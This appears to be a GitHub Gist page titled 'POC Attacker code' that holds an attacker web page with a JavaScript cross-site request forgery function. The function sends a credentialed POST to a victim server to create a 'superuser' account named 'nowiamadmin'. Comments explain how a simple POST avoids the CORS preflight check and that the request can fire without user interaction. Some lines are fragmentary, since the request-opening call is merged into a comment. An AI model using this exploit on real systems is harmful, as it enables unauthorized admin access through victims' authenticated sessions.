Skip to content

Instantly share code, notes, and snippets.

Last active May 31, 2020
What would you like to do?
POC Attacker code
<title>This is the attacker page</title>
<p> This is the attacker's page</p>
<!-- This button is only here for the POC. You can just execute the script without further interaction from the end user by just calling the function. --!>
<button type="button" onclick="csrf()">I double dare you</button>
<textarea id='demo'></textarea>
function csrf() {
var data = "role=superuser&name=nowiamadmin&";
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = this.responseText; //we won't be getting to this part.
//Sending as a simple POST request prevents the OPTIONS pre-check from firing."POST", "", true); //change the url to your victim server IP
xhttp.withCredentials = true; //send the session cookie
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment